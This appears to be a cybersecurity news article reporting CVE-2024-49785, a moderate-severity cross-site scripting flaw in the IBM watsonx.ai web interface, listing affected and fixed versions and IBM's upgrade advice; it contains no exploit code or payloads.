A recently disclosed vulnerability, identified as CVE-2024-49785, has been found in IBM watsonx.ai, including its integration with IBM Cloud Pak for Data.
This vulnerability exposes users to cross-site scripting (XSS) attacks, potentially compromising sensitive information.
The issue arises from improper input neutralization in the Web UI of IBM watsonx.ai. Authenticated users can exploit this flaw to inject arbitrary JavaScript code into the application interface.
This could alter the intended functionality and lead to credential disclosure within a trusted session.
Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free
The vulnerability has been classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and carries a CVSS Base Score of 5.4, indicating moderate severity.
Affected Products and Versions
| Product | Version(s) |
| IBM watsonx.ai on Cloud Pak for Data | 4.8 – 5.0.3 |
| IBM watsonx.ai | 1.1 – 2.0.3 |
IBM strongly advises users to upgrade to the following fixed versions to mitigate the risk:
| Product | Fixed Version(s) |
| IBM watsonx.ai on IBM Software Hub | 5.1.0 and above |
| IBM watsonx.ai | 2.1.0 and above |
IBM advises all customers to subscribe to “My Notifications” for timely alerts about security updates and product support bulletins.
Additionally, users can refer to IBM’s Secure Engineering Web Portal and Product Security Incident Response Blog for further guidance.
This vulnerability was disclosed on January 10, 2025, and is remotely exploitable, requiring some user interaction for successful exploitation.
For more details on upgrading and securing your systems, visit IBM’s official security bulletin or consult the CVE database entry.
By addressing this issue proactively, organizations can prevent potential exploitation and safeguard their sensitive data from malicious actors.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
The cybersecurity landscape continues to evolve rapidly, demanding more sophisticated tools and methodologies to combat…
In a concerning development, cybersecurity experts have identified active exploitation of a critical vulnerability in…
A newly intensified wave of ransomware attacks has surfaced, leveraging the infamous ZeroLogon vulnerability (CVE-2020-1472)…
The Cl0p ransomware group, a prominent player in the cybercrime landscape since 2019, has intensified…
SonicWall firewalls running specific versions of SonicOS are vulnerable to a critical authentication bypass flaw,…
A duo of cybersecurity researchers uncovered a critical vulnerability in a software supply chain, landing…